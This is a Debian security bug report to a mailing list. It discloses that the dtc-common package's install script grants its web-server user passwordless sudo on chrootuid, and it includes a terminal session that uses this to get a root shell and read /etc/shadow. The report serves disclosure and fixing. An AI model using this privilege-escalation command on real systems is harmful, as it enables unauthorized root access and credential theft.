[Secure-testing-team] Bug#637618: dtc-common: giving sudo access to chrootuid is giving access to root
Mike O'Connor
stew at vireo.org
Sat Aug 13 04:56:41 UTC 2011
Package: dtc-common
Severity: critical
Tags: security
Justification: root security hole
the install script gives sudo access to the dtc user (the user that is running
apache) unrestricted access to chrootuid, which essentially gives root access
to the dtc account:
root at testdtc:/var/lib/dtc/etc# su - dtc
$ whoami
dtc
$ sudo chrootuid / root /bin/bash
root at testdtc:/# whoami
root
root at testdtc:/# wc -l /etc/shadow
27 /etc/shadow
rot at testdtc:/# grep dtc /etc/sudoers
Defaults:dtc !set_logname
dtc ALL= NOPASSWD: /usr/bin/chrootuid *
-- System Information:
Debian Release: wheezy/sid
APT prefers unstable
APT policy: (600, 'unstable'), (500, 'testing'), (1, 'experimental')
Architecture: amd64 (x86_64)
Kernel: Linux 3.0.0-1-amd64 (SMP w/2 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash
More information about the Secure-testing-team
mailing list